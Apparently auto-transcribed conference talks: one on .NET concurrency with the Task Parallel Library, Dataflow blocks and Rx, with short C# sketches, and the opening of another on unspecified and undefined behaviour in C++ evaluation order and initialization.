But you can see now I added a continue with method on this. So when that starts after 2,500 milliseconds, this one, and completes, then call this function to run. So this is going to show task one completed, task two completed when you're done. But also, when we do task.whenall, whenall is different. We do previous one, we did waitall blocks. Whenall doesn't block. It says when all those get completed, then run another function. So run this code when it's blocked. So this is going to fall straight through. When this completes, we're going to get some output. And then when everything completes, we get some output. So if we do this, and task started, say to UI's responsive, 25, one second, come on. Oh, sorry, I ran the wrong one again. Sorry, wrong button. Task one completed. Three tasks completed. Everything's all completed. So, and we remain responsible with it. So by not using blocking constructs, using continue withs and such, we kept everything kind of going nicely in the application. So, yeah. Definitional task, is it in a TPL library or a make you a problem? Well, it used to be just TPL. It's now part of.NET, whether it's considered framework. I think it's more of an extension, but it's four on. It's in there for you to use. And what's cool with this stuff, maybe you see a little bit of, I got to watch time, but you can create your own tasks and just wrap another piece of code. And if you want to include code, don't orchestrate it in with continuous. You can use these constructs called task completion sources, which say, hey, just create one of these and then you can say set result, which then when you set that properly, it sets the completed flag. So, it could just be old code legacy code that you wrapped with the task real easily, that then you can now orchestrate through other tasks. The input and output, which is really neat. So, what I'm saying, it's like, tasks don't mean threats. They most usually mean that, but they can be almost any piece of code that you write that you want to involve in, you know, it's running in the future or in the background and I need a result and I need to do something with the result or I need to know when it's done. And you just go use these constructs then instead of, you know, all this low level threading stuff. So, I'm going to look at one last example here because this is one here. This I'm using the scheduler. So, this execute with timeout. This is kind of doing the same things except I'm just playing with the same thing. Playing with the scheduler here doesn't really do much in the demo to be honest. So, doing the same thing, but what I'm going to do here is, because one of the things here you might want to do is go out, get something, try to get it from a couple places and then, but the first one that comes in, the first result I get, that's fine. I don't care about the other ones, but I need to go and, you know, if a certain amount of time expires, let's stop looking for things and go do something else. So, like in the one before we had the tasks array here, which did those two tasks. I made another array where I took a when all of those, but also put in a task delay of the timeout. So, I forget what I passed in here. It's a few seconds and what it will do then because right here I'm doing task when any, it's on this array, the time tasks, when either of those completes. So, either when all of those other ones going out and getting stuff complete or the timeout one completes, do some code. So what we'll see here is this will go and run. 
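Before the demo output, a sketch of the two non-blocking compositions just described: WhenAll with a continuation, and WhenAny racing the work against a timeout. This is a simplified fragment, not the demo's exact code; in a real console sample you would also need to keep the process alive long enough for the continuations to run.

```csharp
using System;
using System.Threading.Tasks;

var tasks = new[]
{
    Task.Delay(2500).ContinueWith(_ => Console.WriteLine("Task one completed")),
    Task.Delay(5000).ContinueWith(_ => Console.WriteLine("Task two completed"))
};

// Non-blocking: schedule follow-up work for when everything is done.
Task.WhenAll(tasks).ContinueWith(_ => Console.WriteLine("Everything completed"));

// Race the whole batch against a timeout.
var timedTasks = new[] { Task.WhenAll(tasks), Task.Delay(3000) };
Task.WhenAny(timedTasks).ContinueWith(_ =>
{
    // If the first element (the WhenAll) isn't the one that finished, we timed out.
    if (!timedTasks[0].IsCompleted)
        Console.WriteLine("Timed out; the source tasks may still be running");
});

Console.WriteLine("Falls straight through; the UI stays responsive");
```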
Okay, task one completed, timeout, status waiting for task two completed. This should be scrolling, but it's not, task two completed and, you know, unfortunately that's not showing everything. It's coming up in. Showing that what's going on here when it came up is when we got through that timeout and got through here, we could check the is completed flag on any task and say, if it's completed on the first one in this array, then it was a timeout. So this one was then showing that, hey, task one is still running or maybe it's shut down, task two was still running. You might want to go and terminate those because you don't need them anymore. And it's a purpose of the next demo which was cancellations and be able to do that. But there's a lot of data flow stuff I want to get to. So if we have some time at the end, we'll come back to these. Let's go back over. Mediation. Okay. One more thing with the TPL. This shows using schedule. This is a pattern which basically you create an object that decides, you know, what's like a priority on actions relative to other actions that you give to it. This uses a custom task scheduler. So let me bring this up here. Window. Didn't open that one ahead of time. So open it up quick. Mediator. This is using custom tasks. Okay. I've created two subclasses of tasks in this example. We have a, where is that one? Let's go to, we can see it in here. Periodic task. Right here. Here's one. These are very simple versions, subclasses of a task. You can subclass a task. A lot of ways you're expected to subclass a task. But what this can be passed in is some work to do, then a budget. And what this, what this task is saying is just having some extra value variables for a scheduler, extra properties for a scheduler to look at. I also have a sporadic task. Go to declaration. Looks very much like it. Almost exactly the same thing. But the way they're going to be handled is different. So periodic tasks. In this case, the mediator I wrote says, if there's any tasks in the queue to be executed that need to finish within the budget, basically in this case, 50 milliseconds, they should be executed before all the other ones. The sporadic tasks, well, whenever there isn't anybody else being processed, then we could do those. So in this case, this can be used to push through events off like a market exchange to the UI while superseding all the UI events, but still interweaving them to an extent to keep some efficiency. So this mediator comes through here. And he's using a custom task at its own type of thing. So when we come in here, we'll see the demo here. Mediation. Mediator. I have two simple examples in here. I'm doing an observable and generating a range of numbers. This is actually our X, the observable thing here saying generate 50 numbers starting at zero. And I'm going to subscribe to it. And every one of those that comes through, I'm going to say, hey, mediator, I want to schedule this piece of data on you to handle. And this mediator does some fancy things like look up what methods in the applique. It's like kind of like a PubSub bus in the app for anything you pass to it. But it says here, for anything that are periodic, run this method. Anything that's sporadic, run this method. So when we go and run this, we'll see here, let's go to Mediation and do the dispatcher only, which is that one. We see you get this sequence of zero, one, two, three, through 50 all the way through it. This threw in zero to 50. And we put it on the mediator. 
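A stripped-down sketch of those two Task subclasses — just enough to show the idea of carrying a scheduling "budget" for a custom scheduler to inspect; the demo's real types do more than this:

```csharp
// Tasks that carry extra metadata a custom TaskScheduler can use when deciding
// who runs next. Task has a public Task(Action) constructor, so subclassing works.
using System;
using System.Threading.Tasks;

class PeriodicTask : Task
{
    public TimeSpan Budget { get; private set; }
    public PeriodicTask(Action action, TimeSpan budget) : base(action)
    {
        Budget = budget;   // e.g. "should finish within 50 ms" -> run before others
    }
}

class SporadicTask : Task
{
    public TimeSpan Budget { get; private set; }
    public SporadicTask(Action action, TimeSpan budget) : base(action)
    {
        Budget = budget;   // only run when nothing time-critical is queued
    }
}
```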
We said do all the work on the UI context. And so what happens with this is the broadcast function looks up the target by topic and sees that it's a sporadic and goes into schedule on the task scheduler, the sporadic. And you see here, we create a sporadic task, pass in what we want to invoke the budget properties. And then we say that tasks start. And you can pass in a scheduler or any task. Typical way to start a task in.NET is task.factory.start new. But you can create a new task, then you can give in any scheduler. So the scheduler has actually passed a task. You can put it in a queue, start its execution whenever you want, compare it to other tasks, and figure out who goes next and do all your own kind of work with that. Because what happens with this one, then, if I come back over and look at this example here, and we're going to see in the view model here, the second example here is I'm doing just through 25 right now because I'm going to do two. I'm going to broadcast such that we want to go run a periodic task and a sporadic task. And we're going to see what happens when that runs because what goes on here is when I run this, doing it all their needing priority, we see we get all the odds come first. Because what happened with this is that first statement in there took the odd number, scheduled it to run on a periodic task, which is scheduled and executed by the task scheduler sooner than the other ones. So all the odds pop out first, and all the evens pop out second. So we can control that with just creating a task scheduler. If you look around a lot, you'll see concepts of pipelines. Anybody familiar with pipelines in TPL? You come across this. Okay, one. Okay, it comes across its basic data flow. There's some good documentation shows you how to do it, but I found this quote by Steven Tobe the other day said, don't do those, use data flow. So guess what? The next topic is data flow. That's where stuff gets really fun. So data flow is data oriented. It's message oriented. You think of data that has to be processing your app and scheduling code to run against the data. There's some very elegant problems that can be solved with this very easily, which I'll show a few. It's similar to message passing after base programming. It's got contracts for passing flow, data message between blocks, handling order, doing search and all kinds of, I'm sorry, changing path based upon the value of the data in the network. It's very similar to continue with TPL, except it's a lot more powerful. Continue with has a problem. When you say this task, continue with another task, you're only going to go to that task. And you can't say when you're done this, spread the data that's coming through that first task across eight different versions of this continue with the load balance to work. So tasks really form pipelines. Like you see, it's like from here to here to here to here to here. And you get this straight through construct that pretty much is one task, one task, one task, one task all the way through the thing, unless you write task orders to try to handle this stuff separately. Data flow breaks through all that. I have some slides on what's involved with this. But basically, the concept is you work with blocks. And I data, if they're all implement I data flow block, you get source blocks, target blocks, and propagator blocks. So you want to put data in a data flow network to be processed. You post it to a source block. A source block can pass data to a target block, another block. 
A propagator block can receive and send data. It's just emerging in these things. But there's some building implementations of this, which I'll show a couple of these. The buffer block doesn't do much of anything except queues up data and sends it downstream when it feels it's convenient. So it's a way of building a thread safe queue of data for processing. That's basically what this does. A write once block will only execute once, ensuring that this piece of data only gets processed once in a multi-threaded environment. So a broadcast block, the data you send in there, everything that's connected to it, send it to every one of them. So you can fan the data out evenly. Well, the same piece, one piece of data to everything. Then there's execution blocks. These only, these with these, you basically, you can assign code to it. So you put a piece of data in, and you say, run this function on it. And in the case of an action block, that's all it does. Receive the piece of data, run the code. A transform block receives a piece of data, you run code, it expects a result, return from it. So you return something new, you transform the data, pass it down the network. Then you have transform many, all kinds of things. There's stuff for joining. One problem is our data is coming from here, from here. How do I, when I get one from here, I want to put them together and send it down. You can do it automatically with these join blocks. There's batch join blocks and join blocks and all kinds of different things. So I think usually the best way to demonstrate this is just to, I mean, explain data flows to just show it running. So we're going to go over, I have a number of demos built up here. Okay. So let's bring up data flow and look at some of these examples. Okay. The basic construct is action blocks. So the first demo is, we're going to create an action block. So you say new action block, the type of the data you want to process with it. Just using integers, it can be any type. And then you give it a lambda function that says, oh. Okay. Get that about 40 times a day. Usually an examile designer, but not that. So here's something new. And what this static function I have here just writes the task ID and the value of the data out so you can see this in operation. Then on the action block, you can say post. I'm going to post an integer of one, two, and three into this. And we'll watch it run. So post three items, no waiting. So you can see some things going on here. I said I ran the action. I'm not using mediation. Ran action message via mediator, which they're just some diagnostic stuff. Then you'll see here, task ID 777, value one, two, three. That function that delegate I have in here basically then got scheduled to run on a task, was passed all those pieces of data one by one in sequence, and it generated the output. Action blocks have semantics such that they have a queue that can accept as many items as they want. But by default, they will only ever create one task to execute the data at any time. So that's why we see here, task ID 777. This only allocated one task. So it's guaranteed that the order that you post in, you get the order through there, and it's going to be run through one task. So there's not really any real concurrency in here except that it's run in the background. So I'm going to skip on this one. There's different ways of telling when work's done in Dataflow, which I got to watch the time because of this. 
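A minimal ActionBlock sketch along the lines of that first demo — assuming the TPL Dataflow package (System.Threading.Tasks.Dataflow) is referenced — might be:

```csharp
// Post a few integers into an ActionBlock and let it run the delegate on them.
// By default the block uses a single task at a time, so order is preserved.
using System;
using System.Threading.Tasks;
using System.Threading.Tasks.Dataflow;

static class ActionBlockDemo
{
    public static async Task RunAsync()
    {
        var actionBlock = new ActionBlock<int>(value =>
            Console.WriteLine("task {0}, value {1}", Task.CurrentId, value));

        actionBlock.Post(1);
        actionBlock.Post(2);
        actionBlock.Post(3);

        actionBlock.Complete();        // signal: no more input is coming
        await actionBlock.Completion;  // wait (without blocking) for the queue to drain
    }
}
```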
But basically, there's an input count, how many things are in an action block's in queue. Then we're getting back to completions here. You can see this is same action block, posting 20 items in, just using a thing to generate it now. But I'm going to say action block.complete. They kind of have a completion status like a task. So if you want to wait, if you throw a bunch of items in an action block to be processed, and they take a while, which I'll show, and you want to know when all the items are done, you can set a complete flag and then wait for that to be completed or do a continue with on this function to do some more work when it's done. So we'll see this one. This is actually kind of bad because this comes in and blocks. And it's running through and see we're still doing more and it's still on one task. But you see this message came out at the end here. That's actually higher up. It's in the calling function of this. But because I waited here, we really kind of blocked there until all these messages came out on the main thread. So the trick is, okay, I want to start getting a little more concurrent with this. This is the same as like the first example. An action block, passing in the delegate. But every one of these blocks always has these data flow block options. This is an execution block. So in this one, I'm going to say max degree of parallelism equals two. By default, it's one. So when we run this, when this is run, and I run it, you can see now task ID 910, 999, 910, blah, blah. It's now created two more tasks. They're actually on different threads. And the data you can see nicely is actually being processed still in order, 0, 1, 2, 3. But it's being run across multiple tasks. And all I had to do with that is change max degree of parallelism. So we can probably bump this up. Let's say we, you know, then I got to recompile and stuff. So I don't want to break any demos. But you can bump this up, the limit is as high as max value. Whether that does you any good, I don't know. There's other constructs in here. Like if you look at the options that are in here, you have max messages per task, bounded capacity. Like I said, this block has a queue of items. You can pass an action block and hold any amount of items, but only apply max degree of parallelism instances of that delegate against those messages at one time. Well, I can say now I only want to have a max of 100 incoming messages. So in a way, action block, if you look at it, you can start implementing like disruptor pattern if you're familiar with that with like bounded input queues, rounded queues going through this, controlling how much is coming in and how many things are working on one thing at one time. In any of these, you can also do task scheduler. I can run this on any task scheduler. I could say run this block just on the UI thread. Maybe I don't want to really do that most of the time. By default, they're like thread pool. But if there's a block down near the end of the data flow, what I want to do is run that one on the UI thread because it's going to update the screen. So I can run it all on the background until I just get it last block and say, hey, boom, up on the screen. So let's jump ahead and look at some of that stuff because that's starting to get into buffer blocks. So when you bring up buffer blocks, and it's probably the only other block I'll show here today for time constraints. So I really want to get into that next demo in some more acts. 
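Put together, the options just mentioned might be set up roughly like this — the numbers are illustrative, not the demo's settings:

```csharp
// ExecutionDataflowBlockOptions: parallelism, a bounded input queue, and
// pinning the block to a particular scheduler (for example the UI one).
using System;
using System.Threading.Tasks;
using System.Threading.Tasks.Dataflow;

static class ActionBlockOptionsDemo
{
    public static ActionBlock<int> Create(TaskScheduler uiScheduler)
    {
        var options = new ExecutionDataflowBlockOptions
        {
            MaxDegreeOfParallelism = 2,  // run the delegate on up to two tasks at once
            BoundedCapacity = 100,       // at most 100 queued items; Post returns false when full
            TaskScheduler = uiScheduler  // e.g. TaskScheduler.FromCurrentSynchronizationContext()
        };

        return new ActionBlock<int>(
            value => Console.WriteLine("task {0}, value {1}", Task.CurrentId, value),
            options);
    }
}
```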
So the buffer block, buffers really all they do is they're just a queue to hold things. You don't even give them a delegate to execute anything. So you can see here, I'm creating a buffer block. I'm creating an action block that's just kind of just the same thing before. They're going to generate 10 items. But you see here a trick here is I'm saying buffer block link to action block. So the buffer block, you'll post things into the buffer block. The buffer block will receive them, queue them, and then it does a two-phase handshake with the action block because of that link to the pass items to it downstream. And so this one will do. It'll be very much exactly the same kind of as the first example running here. But we can start doing more advanced things with it. So I just do that. Boom. It's actually kind of the same as the action block one because it kind of is in a way. But then if you want to get a little more complicated, you can see here, I've said here on the action block now, let's go to two degrees of parallelism on the action block. There's still one buffer block linking downstream. When I run this one, you can see now basic two degree, task ID 12, and I'm only writing the values out on one. So that's good. So let's now, here's where we can get fancy with this. The, I'm now creating the buffer block with two action blocks. First one is going to write out what data it gets and whatever. Then on the buffer block here, I'm doing a link to both of those blocks. But I can say, hey, if the value being passed through is odd, go to the first action block. If it's even go to the other action block. So I'm doing basically content-based routing through this. So as the data is coming through, I'm making a decision on where to go through the blocks in the data network. So if we run this one, odd even, you'll see now that block two, it's zero, two, four, now block one gets all the even because of that distribution pattern. And then there's some other things I won't look at here right now because it gets in detail. But basically, the action block has that queue waiting for it. They run in greedy. So if that buffer block has 100 items and it goes to that block and it says, I've got 100 items, can you have it? I can take any amount, you give me, you give all 100 to that one item, that one action block. If you cut it down to max size of one on the action block, it'll say, I've got 100. The action block can say, I'll take one, okay, I'll give you one. Then I'll go to the next action block, denim link two, try to pass it to the next guy so it can start rotating and round robbing, load distributing work that way by a simple concept like that. Broadcast blocks, we'll see this in another example because we're running low on time, but basically fans everything out to everybody. So RX, and then we jump into the other demo. It's a big topic. I've been trying to get my head around RX for about three or four years, but basically it sets up an observer pattern where you can start, instead of iterating through things like enumerable, like doing four each and being active on every item in the group. RX sets up with the observable. Here's a function for you to call anytime some new data appears in the stream, which is to prime everything. But it also gives you a lot of capability for working with the data in those streams that delegate you give it. Should I run that on the UI? Should I run it on a background thread or different types of things like that? 
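Going back to the odd/even routing demo for a moment, a sketch of that content-based routing with LinkTo predicates could look like this (illustrative, not the demo's exact code):

```csharp
// A BufferBlock linked to two ActionBlocks; the predicate on each LinkTo
// decides which downstream block receives a given message.
using System;
using System.Threading.Tasks.Dataflow;

static class RoutingDemo
{
    public static void Run()
    {
        var buffer    = new BufferBlock<int>();
        var oddBlock  = new ActionBlock<int>(v => Console.WriteLine("block 1 (odd): {0}", v));
        var evenBlock = new ActionBlock<int>(v => Console.WriteLine("block 2 (even): {0}", v));

        buffer.LinkTo(oddBlock,  v => v % 2 != 0);
        buffer.LinkTo(evenBlock, v => v % 2 == 0);

        for (int i = 0; i < 10; i++)
            buffer.Post(i);
    }
}
```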
And mostly what you do with it is you convert some link queries to observables and then start processing those. But it's almost an endless amount of things that you can do with this. So let's go. We're going to have two demos over here, a pure RX. Okay. Let's go over to... RX examples, few model. I don't have it open right there. Oh! RX examples, few model. Okay. The first function here does a periodic generation of items, which I use it in the other demo. So I wanted to show it here by itself. But you can say...you create a, you know, a declare an observable. It's a class with a lot of static methods. And you could say dot interval. So on an interval that you specify here, every 200, every quarter of a second, start generating a sequence, which is basically...this is every 250 milliseconds, it's going to go zero, one, two, three, four, till, you know, if you want forever. But I'm going to say then I'm going to take 20 of those. So instead of going forever, I only take the...when you hit 20, stop. Okay. I'm going to say observe on a dispatcher. Okay. So when I get to this point, this function here, I'm going to be running on the UI dispatcher because I'm going to drop the value that's in there into an observable collection that's bound to the UI. And the subscribe method basically says, okay, you got an item called this function. But call it on the dispatcher thread, generate 20, and go through there. So let's go to RX and generate periodically. So this is going every quarter of a second cranking one hour for 20 items. That's real cool. That's step one. The next thing that I like a lot with this is observable. We're doing the same thing, but we're going to say buffer. And the example, the trading example I'm getting to in three minutes, within three minutes, is doing a lot of buffering. So this is going to say, instead of giving me every time it shows up, collect them all for this amount of time, which is one second, and then give me the group of them that was collected. So this should, in theory, give me four at a time. Sometimes it's three, never five. So we go run this. Let's see here we do batch. The second one always comes up four, five, six. I don't know why it's peculiar to this example, but so it's only given to me every second instead. And this continues, this one goes on forever. I notice I didn't have a take in there of 20. So to stop this from going, every one of these observes returns an idisposable. So to stop things, you just call idispose, disposable.dispose, and it stops them. So if you want to clean them up, that's good. So those are the two useful things that I found in Rx for the kind of work that I do these days. I'm going to show you how that all pulls together, because we'll be back to this guy. And let's run this again, and we'll see what's going on here. I want to make sure, I want to run it to code here real quick. And to end examples view model. Okay. Here's the coup de grace of all this. Okay. When I press that start button, this method gets called, and there's some things that's keeping track of, but I'm basically saying I want to, on an interval of some amount of milliseconds, which up here is defined as one millisecond. That's as fast as you can schedule things on the thread pool. Get in there if you do more. I want to take 5,000 items. So I say I want to take the first 5,000 items. So basically 1,000 items a second for five seconds. Okay. So that created an observable. 
From that observable, I'm actually doing a link statement, because that observable is going to give me 0, 1, 2, 3, 4, 5, blah, blah, blah. This is actually generating some mock data flying into the system. So what's the security? Well, I'm just using numbers, you know, like a stock or bond by name. I'm just using a number. And I'm picking which field to use and a value for that. So for every one of those events, I'm selecting creating an update item. And this creates another observable in the generator observable. So from that generator, I'm then going to say I want a buffer based upon this time straight. So that interval is, right now, I've got that at 100 milliseconds. So instead of 1 every millisecond, give me 100 every 10th of a second. We're slowing down that flood of things in, of things coming in from other systems, right away, right here. And then that's saying, hey, this is doing some work called conflation, which I don't have the time to get into right now. But then passing down. So then I start doing some data flow. That was all RX up to now. So now I'm going to create a transform block, which really doesn't do anything. This is going to pass downstream, but it's going to allow me to specify higher degrees of parallelism to go in here.
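A compressed sketch of the pipeline being described — Rx generating and buffering mock updates, then handing each batch to a Dataflow block — might look like this; the UpdateItem type and the numbers are stand-ins, not the demo's code, and it assumes Rx (System.Reactive) plus TPL Dataflow are referenced:

```csharp
// Rx feeds mock market data at ~1000 events/second, Buffer turns the flood into
// one batch per 100 ms, and each batch is posted into a Dataflow network whose
// head is a pass-through TransformBlock.
using System;
using System.Collections.Generic;
using System.Reactive.Linq;
using System.Threading.Tasks.Dataflow;

class UpdateItem { public int Security; public int Field; public double Value; }

static class RxToDataflow
{
    public static IDisposable Start(ITargetBlock<IList<UpdateItem>> pipeline)
    {
        var updates = Observable
            .Interval(TimeSpan.FromMilliseconds(1))  // mock feed: ~1 event per millisecond
            .Take(5000)                               // five seconds' worth of data
            .Select(i => new UpdateItem { Security = (int)(i % 10), Field = (int)(i % 3), Value = i });

        return updates
            .Buffer(TimeSpan.FromMilliseconds(100))    // conflate into one batch per 100 ms
            .Subscribe(batch => pipeline.Post(batch)); // hand each batch to the Dataflow network
    }

    public static TransformBlock<IList<UpdateItem>, IList<UpdateItem>> CreatePipelineHead()
    {
        // A pass-through block; its options are where higher degrees of
        // parallelism could be specified for the downstream work.
        return new TransformBlock<IList<UpdateItem>, IList<UpdateItem>>(batch => batch);
    }
}
```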
|
Join Michael as he gives a practical overview of programming responsive and highly concurrent / parallel applications using the Task Parallel Library, Async/Await, and Dataflow networks in .NET. These three additions to .NET provide a new and, when understood, much easier way to coordinate multiple tasks within your application, allowing you to focus on what you need to do instead of the details of how to do multithreaded programming. We will look at common patterns of concurrent programming made simple with TPL, how async/await helps to make TPL easier, and how Dataflow networks can be used to orchestrate data concurrently in your application.
|
10.5446/51483 (DOI)
|
Thank you for coming. This session is about deep understanding of both C and C++. But I have C has certain issues that we are not going to cover here, so I will only be talking about C++. And I am one of those who considers C and C++ to be completely different languages. They do have something in common, just like Java and.NET have something in common, but they are different languages. And I find that important. So as programmers, we are used to sitting at the keyboard, typing, feeling confident, masters of the world, this is our domain, we are invincible. And then once in a while, someone comes and bites us. And this is more common in C and C++, as in any other language, I guess. And the shark is bigger than most, because it's really, really bad what you can do if you don't know exactly what you are doing in C++. So just to warm up, I would like to give you the audience a small exercise. And I hope that you will, well, actually I don't want, team up with the person next to you and discuss what you think this will print out. And this is the warm up question. Discuss with the person next to you. What do you think it will print out? I don't hear any discussions. Take the next person. Because there will be several of these exercises. This is a good warm up. It's getting slightly harder than this. And there are no completion errors or something like that. It's not fun stuff going on here. This is perfectly fine code. But of course, since it's kind of a small snippet to demonstrate something, it's nobody would write code like that, of course. Okay. Let's have a look at what's happening here. We are entering main. Then we have an expression here, sub-expression, that is going to be evaluated. And it's calling foo. And foo is just printing the argument and then returning the argument. But it's calling foo two times and then assigning it to i and then printing it out i. So what do you think it will print first? Any suggestions? Three. Yeah, I like that answer. Four. I like that answer as well. No, it's not undefined. It is unspecified. But thanks for suggesting that, because that is a key thing. And this is the example of unspecified. And on my machine, I get three and then four and then seven. And for the next one, I get four, three, and then seven. But the key point is that you can also get four, three, seven, three, four, seven. Well, any combination like this. And this is an example of unspecified behavior. And c and c++ are among the few languages out there that does not specify the evaluation order. If you write the code snippet like this in mostly any other programming language, you can assume a certain evaluation order. And that is what we will be used to. So if you move from another language into c and c++, this is one of the things that will might surprise you. And if it doesn't surprise you after the first few months, maybe after the next first few years, and maybe after 10 years, I have met several programmers that have been programming for 15 years and they never knew this. And suddenly they say, ah, that's the reason why my log messages come out in the wrong order sometimes. Because they have functions which are logging. And suddenly it just looks like it's random. And they had all sorts of explanation for why this happened. And they never kind of realized that the evaluation order is not specified. 
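Reconstructed from the description above, the warm-up snippet is roughly this (the slide's exact formatting may differ, but the behaviour is the point):

```cpp
// Unspecified evaluation order: the two calls to foo may run in either order.
#include <cstdio>

int foo(int n)
{
    printf("%d ", n);   // side effect: print the argument
    return n;
}

int main()
{
    int i = foo(3) + foo(4);   // order of the two calls is unspecified
    printf("%d\n", i);          // so the output is "3 4 7" or "4 3 7"
}
```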
And it is actually so, although I've never seen it in real code, in real life, but it's actually so that according to the standard, every time you run through it, it can give different evaluation order. So it's a liberty that kind of the abstract machine or the execution machine can do. Yes, there is a question there. Oh, yeah, yeah. And that's the reason why I kind of introduced it as since we are trying to show an example on one page, then some of the code will look a bit strange. Yeah, so, yeah, that's true. I've given this talk a few times. I know usually what's being discussed. But this is an example of unspecified behavior. And why is it mostly unspecified in C and C++? Do you have any suggestions for that? Because optimization is suggested here. Sequence points, that's very good. We will cover that one later. It's not actually called sequence points anymore. But that's usually when a program, a C and C++ program moves on to the next level, they start learning about sequence points. It is possible to program without knowing sequence points, but usually you create bugs instead of good programs. So, but optimization, that is the best answer, the optimization thing. But while I didn't write it on the slides, I think one of the reasons is kind of a bit laziness as well. Because for some type of expressions, it's much easier to write a compiler if you don't need to worry about it. And this is something that we'll look at later. But certainly optimization is the key thing. When you don't specify the evaluation order, you can have a big expression. And you can let the compiler reorganize the evaluation of the expression in any order and then create a pipeline of instructions and then just churn it through the system, through the CPU, to produce a result very quickly. Having that information, now try to reason about this exercise. And then you have to do it with the person next to you, because this is something that is kind of impossible to do by yourself. I knowrado as doing quality So does anyone want to try to give a comment? I would like to give me a number. What will print in your development environment? That's important because I will ask for the theoretical answer afterwards. But what will happen in your development environment? You think? 14 is suggested. Everyone agrees on 14? 11? I like that answer as well. 13? That's a good answer. Now it is undefined. Yes, so this is undefined. But it will usually print something in your development environment. But I've only heard 11 and 13. I think you corrected 14 into 13. Any other suggestion? It depends on if it increments 5 before. So because the evaluation order is not specified, then you don't know when the side effects take place and how it's taking place. And C and C++ deals with that by saying if you have two side effects happening at the same time in evaluating this expression, it's undefined behavior. I don't care. I just give you whatever. And if on my computer, and this is real, this is not something I've just invented, it took me some time to find exactly this answer. Now this code snippet, I was reading assembler and assembler and assembler from different compilers to realize how they actually compiled incorrect code until I said, oh yes, this must give me... clang, gives me 11. Someone suggested 11. Intel compiler gives me 13. And GCC gives me 12. And it's interesting because you don't get any warnings either. It just gives you a number. And this is a classic example of undefined behavior. And the problem is on this slide. 
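The exercise's code is not reproduced in the transcript, but an expression of this shape has the same flaw — the variable is modified more than once with no sequencing in between — and shows why different compilers can legitimately print different numbers:

```cpp
// Not the slide's code, just an illustrative expression with two unsequenced
// side effects on the same object: undefined behaviour.
#include <cstdio>

int main()
{
    int a = 5;
    int result = a++ + ++a;   // 'a' modified twice within one full expression
    printf("%d\n", result);    // gcc, clang and icc may all disagree -- none is "right"
}
```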
And you might say, nah, nah, nah, this doesn't happen. But the thing is, it does happen. Unless you have a very small code base with only a few developers. If you're working in a large code base with lots of developers and somebody have different backgrounds, et cetera, and some of them don't even know the rules of sequencing and sequence points, once in a while they will produce this. Not always as obvious like this, but it could be as a result of maybe a macro, or it could be hidden like undefined behavior in other ways than this one obvious here. And actually this increasing the index into a vector and using the value at the same time is not very uncommon to find actually in a large code base. Yes, there's a question. Is there a problem on a specific platform, or do you switch between platforms? It is something that you notice more often when you switch between platforms and when you switch compilers. And very often when you change the optimization level, very often when you take a code base and you try to compile it with a new compiler and it doesn't work, it's because you have undefined behavior somewhere in your code. So you take it from an Intel CPU and into an ARM for example and you get the difference results. Very often it's because you have undefined behavior somewhere. But as long as you're staying the same. And yeah, and don't, if you stay on the same architecture with the same compiler versions and never change the optimization level, it's more seldom that you see these problems. But you could see it, yeah. If the plan is aligned correctly, et cetera. So, and the interesting thing as well is that you cannot rely on your compiler to detect this. Now on my machine, I put on all the flags. No warnings, no warnings. I was actually surprised to see that the C++ version of GCC gives me a warning because I know that the C version of GCC with exactly the same code does not give me a warning. I need to study this a bit more why does it actually detect this. Because the compilers usually don't see this and even if they see undefined behavior, very often they are reluctant to report it. Yes? They are not sure either. That's a good observation. So they are not even sure about it. And the reason is that it's... Well, you can see here. Why don't you get a warning or an invalid code? Any suggestion? Too hard. Too hard? That is a very good answer and sometimes you could also say impossible. Because some of these kind of undefined behavior occurs between compilation units and the way C and C++ works. If you can only see one compilation unit at a time, then it's impossible to see it. It's like having the blind spots on you. The compiler cannot see it. So instead of pretending like it's able to see the... see the invalid code, it's rather saying may or not reporting it at all. But also there is a very good reason in C in particular, because one of the design goals of C has always been that it should be the first language to execute on a new hardware, apart from assembler. And that also means it's a design goal that for an experienced compiler writer should be able to write a C compiler for like three months, I've heard. Something like that. And if you talk to compiler writers, they will let you know that 98% of their time is spent on making... trying to make some reason out of invalid code and give correct diagnostic messages, etc. They can always compile a happy story, but the corner cases are very difficult to diagnose. 
So it's important for the C standard not to impose rules on the compiler that you have to diagnose incorrect and all kind of ill-formed code. And this attitude has been adopted by the C++ standard. I'm not sure if that is necessarily such a good idea. And there is now actually a study group in the standards committee, which I have been invited to join, actually, to look at how can we get rid of some of this strange behavior with unspecified and undefined behavior in C++. I don't think it is possible to do that in C, because if you add too many draconian rules to C, then it will not be the first language after assembler on new architectures. And this leads into how you should think about C and C++, because they are really more like portable assemblers. They might hide the fact that they are portable assemblers, but they are portable assemblers. And I don't believe it's possible for a large group of people to write correct code if they don't have a good understanding of the underlying hardware and the underlying CPUs, as well as not making assumptions that this will be true on all kind of architectures. So I actually think that being able to read and write assembler and understand what happens under the hood is essential for C and C++ programmers. And in addition to, of course, the history and the design goals of those languages. So we brought a slide deck about this thing called the Deep-C and C++. Just curious, how many have seen this slide deck? I see four or five hands. If you are interested, you should go and have a look at it. We thought it would be popular, but we had nearly 30,000 downloads the first day of this 445 slides, and 200,000 downloads the first week, and we were just overwhelmed with email from all around the world and we had been programming C and C++ for decades, and we didn't know this, where can we find more information about it? And that is the reason why I feel it's important to kind of spread this knowledge, which we are going to do. So let's just start with some basic stuff here. What will this piece of code write? I'm not going to do an exercise on this, but you would expect it to write 4. We know that. Now let's change this one into static. What does it write now? Yeah, we are at a very simple level, still. 456. What happens now? Undefined, I hear. Anything else? 1, 2, 3, yeah, assigned to 0 is actually initialized to 0. Initialization and assignment is slightly different in C++, so it's initialized to 0, and this is something that we know for sure. That's according to the language specification. So variables with static storage duration do get the default value, and in this case 0. If it's an object, the default constructor will be called in C++. And yeah, if you have the privilege of only reading and reasoning about your own code, you can have these rules that say, I'll explicitly initialize it, but sometimes you have to reason and discuss code written by others, and then it's very useful to actually know this. And it's also useful to know why you get 0 there. We'll discuss that later. What happens now? Who knows? That is a very good answer. Any other suggestions? Naisal demons. Naisal demons, that's a very good answer. Anything else? So what do you think will happen in practice though? So that's two very good theoretical answers. The first one, you will essentially just get whatever is in the memory location of A, right? And that will be implemented for one. 
